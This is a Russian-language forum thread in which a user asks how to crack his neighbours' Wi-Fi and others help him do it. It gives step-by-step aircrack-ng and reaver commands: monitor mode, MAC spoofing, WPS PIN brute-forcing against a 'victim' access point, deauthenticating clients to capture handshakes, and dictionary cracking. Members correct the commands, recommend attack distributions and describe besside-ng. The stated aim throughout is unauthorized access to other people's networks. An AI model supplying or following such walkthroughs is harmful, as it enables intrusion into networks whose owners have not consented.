Что не так в инструкции!?

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by ChronAlkash, 23 Oct 2013.

  1. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    наконец то после долгих мучений, анализа нескольких гигов не русских видеозаписей до меня почти что дошло как ломать соседский вайфай:) подскажите точнее дополните инструкцию, разъясните что не так и как надо!?
    имеется адаптер RTL8187L
    из винды 7 гружу виртуальную машину VMware workstation образ BackTrack 5 R3 чтобы печатать в окне виртуальной машины нажимаю ctrl+G чтобы выйти нажимаем ctrl+alt... пишу STARTX запускается система!
    адаптер USB подключаю, сразу он не определяется только после того как кликнуть на иконку юсб внизу справа в трее!
    открываю консоль или терминал пишу
    airmon-ng -определяется адаптер,драва
    airmon-ng start wlan0 -переводим в режим мониторинга (появился mon0)
    airodump-ng mon0 - сканируем доступные роутеры
    нажимаем ctrl+C -остановить процес
    wash -i mon0 -определяем уязвимые цели, yes-заблокирована, no- возможен подбор!
    нажимаем ctrl+C -останавливаем процес
    копируем BSSID жертвы
    reaver -i mon0 -b (вставляем BSSID) -vv -L -ищет канал при удачном поиске будет автоматически подбирать пинкод сети!
    отображается в % за 8 часов у меня было 40% и дальше виснет, пробывал 2 раза(((
     
  2. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    пробывал и вот так!
    airmon-ng
    airmon-ng start wlan0
    ifconfig mon0 down
    macchanger -m 00:11:22:33:44:55 mon0
    ifconfig mon0 up
    airodump-ng mon0
    запоминаем ESSID , BSSID, Сh, Station
    airodump-ng -c (Ch) -w wpa --bssid (жертвы) --ivs mon0
    и всё капец на этом выдаёт ошибку что то типо нет wpa-01.ivs
    но у меня по инструкции дальше открываю новое окно
    aireplay-ng -0 5 -a (BSSID вставить) -c (Station вставить) mon0
    повторяем попытки пока не появиться WPAhandshake!!!
    окно можно закрыть
    aircrack-ng -w desktop/wordlist.txt wpa-01.ivs
    и появляется долгожданный KEY FOUND но не хрена ведь блин...что делать, как добиться результата???
     
  3. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,811
    Likes Received:
    18,433
    Reputations:
    377
    По reaver читаем: http://habrahabr.ru/company/xakep/blog/143834/
    По aircrack-ng:
    airodump-ng --bssid Точки доступа -w cap mon0
    вместо: airodump-ng -c (Ch) -w wpa --bssid (жертвы) --ivs mon0

    Так же почитайте: http://forum.antichat.ru/thread309017.html
     
    _________________________
    #3 user100, 24 Oct 2013
    Last edited: 24 Oct 2013
  4. comporg

    comporg Member

    Joined:
    6 May 2013
    Messages:
    535
    Likes Received:
    45
    Reputations:
    2
    Команду правильно задай:
    reaver -i mon0 -b (bssid) -a -vv -c (ch)
    (bssid) - Мас жертвы
    (ch) - канал жертвы

    Здесь тоже, команду правильно задай:
    airodump-ng -w wpa --bssid (жертвы) -c (Ch) mon0
    aircrack-ng -0 /root/wpa-01.cap -w desktop/wordlist.txt
     
    #4 comporg, 24 Oct 2013
    Last edited: 24 Oct 2013
  5. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    он мне выдал вот такое:
    airodump-ng --bssid Точки доступа -w cap mon0
    ioctl (SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
     
  6. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    airodump-ng -w wpa --bssid (жертвы) -c (Ch) mon0
    выдал вот это:
    airodump-ng: invalid option -- '?'
    "airodump-ng --help" for help.
     
  7. comporg

    comporg Member

    Joined:
    6 May 2013
    Messages:
    535
    Likes Received:
    45
    Reputations:
    2
    Когда ты задавал команду:
    airmon-ng
    Надо выбирать wlan1 с чипсетом RTL8187L, а wlan0 это встроенная сетевая. У меня так показывает.
     
  8. comporg

    comporg Member

    Joined:
    6 May 2013
    Messages:
    535
    Likes Received:
    45
    Reputations:
    2
    Вот тебе видео:
    http://www.youtube.com/watch?v=JjBTPyCNWhw
     
  9. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    [​IMG][​IMG]


    проделыл всё как на видео, и всё безтолку




    че то не хрена не получается блин...вроде как пол пути уже пройдено, но какая нить ерунда да вылезет...че ещё надо то...на видео всё быстренько, повторяю и ноль толку...

    всё проделал как на видео, пишет либо по русски говоря что через 60 секунд повторится попытка, я понимаю что роутер сбрасывает подбор и разрешает через минуту, короче хрен.... или начинает подбирать и выдаёт проценты 0,02% и так 8 часов опять без толку...я уже могу только догадываться что или маршрутизаторы пошли какие то без уязвимостей или прошивки все мои соседи разом поменяли где уже испралены эти дыры...или есть ещё варианты раздобыть пароль???
     
    #9 ChronAlkash, 24 Oct 2013
    Last edited: 24 Oct 2013
  10. comporg

    comporg Member

    Joined:
    6 May 2013
    Messages:
    535
    Likes Received:
    45
    Reputations:
    2
    Пробуй "Kali Linux 1.0.5" или "BackTrack 5R3 Gnome" или "Wifislax 4.6" - может с той сборкой не то? Попробуй. Ещё попробуй не с виртуальной машины грузиться, а нарезать на флэшку и загрузиться с Live USB
     
  11. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    вот эта сборка которою я юзаю http://rutracker.org/forum/viewtopic.php?t=4153616

    может быть кто нибудь поделится ссылкой на ту сборку которой он действительно добивался результата!!!???
     
  12. comporg

    comporg Member

    Joined:
    6 May 2013
    Messages:
    535
    Likes Received:
    45
    Reputations:
    2
    http://www.kali.org/downloads/

    Kali Linux 64 torrent
    ___________________________

    http://www.backtrack-linux.org/downloads/

    BackTrack 5R3 Gnome - 32

    Эти сборки отлично у меня работают, попробуй!
     
  13. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    ок! качаю! отпишусь!
     
  14. Sitronik

    Sitronik Member

    Joined:
    4 Oct 2012
    Messages:
    184
    Likes Received:
    33
    Reputations:
    3
    Попробуй еще один вариант запустить Backtrack с флешки так лутче работает и быстрее намного и должна твоя проблема решиться.
    Вот тебе прога что бы зделать загрузочную флешку:
    http://dfiles.ru/files/m8fginwbz
    Отпишись как попробуешь.
     
  15. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    я думаю с диска загрузиться будет то же самое так ведь??? ту же сборку что с виртуалки грузил...короче напишу как протестируюб всё!!!
     
  16. Sitronik

    Sitronik Member

    Joined:
    4 Oct 2012
    Messages:
    184
    Likes Received:
    33
    Reputations:
    3
    С флешки лутче работать будет с диска даже и не пробывал потому что это гиблое дело лутче на флеху кидай.
     
  17. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    Ну да с флехи и правдо работает быстрее, но не какого результата я так и не получил блин, хотя все команды вводил правильно!!! похоже действительно все соседи поставили себе роутеры wifi а сами подключены кабелем и не пользуются беспроводным...сетей вокруге куча при сканировании bssid появляется а station по штуке 2-4 при том что в нижних строчках на месте bssid появляется че то типо не определено, только по английски...начинаю сканить конкретную сеть по очередности station в некоторых вообще не определяется а в тех где появляется там сигнал ваще слабый((((блин как раздобыть пароли соседей???:)
     
  18. Sitronik

    Sitronik Member

    Joined:
    4 Oct 2012
    Messages:
    184
    Likes Received:
    33
    Reputations:
    3
    А какой у тебя wi-fi адаптер?
     
  19. ChronAlkash

    ChronAlkash New Member

    Joined:
    17 Mar 2012
    Messages:
    39
    Likes Received:
    0
    Reputations:
    0
    у меня есть китайский с чипом реалтек 8781L и есть тп-линк 7200. все проделывал реалтековским...
     
  20. col

    col Member

    Joined:
    5 Aug 2013
    Messages:
    97
    Likes Received:
    7
    Reputations:
    0
    правильно тебе написали в начале прочти вай фай для чайников,там подробно все написано.
    iwconfig -видим список беспроводных адаптеров
    (ifconfig -все адаптеры)
    airmon-ng -включаем режим монитора на нужном тебе
    вай фай адаптере wlan0,wlan1 (iwconfig поможет)
    далее нужно собрать хендшейки.
    airodump-ng mon0(mon1) -можно оставить и так ,когда словишь-увидишь, или с указанием нужного bssid(тд).
    И здесь тебе нужно -ТЕРПЕНИЕ.
    ( у меня 2 недели ноут стоял рядом с ПК,
    сутками не выключал .ноут ловит хендши ,на ПК хашкат -и
    все это сутками.)
    в airodump смотрим у кого есть клиенты,твоя задача -
    словить дампы подключения (отключения) клиента- к точке доступа.
    1)можно просто ждать (воможно долго)
    2)попробовать насильно отключить клиента (aireplay-ng)
    3)besside-ng -я так понял совсем жестокий способ (очень много помех если включишь без указания конкретного бссид ,даже если укажешь бссид ,то другие
    т.д. которые на этом канале тоже будут вести себя неадекватно.) но удобная ,простая комманда ,сама сохраняет хендшеки в root\besside-ng __.cap .log
    вот как-то так.
    удачи тебе . и не забывай сохранять хендшейки на флешку!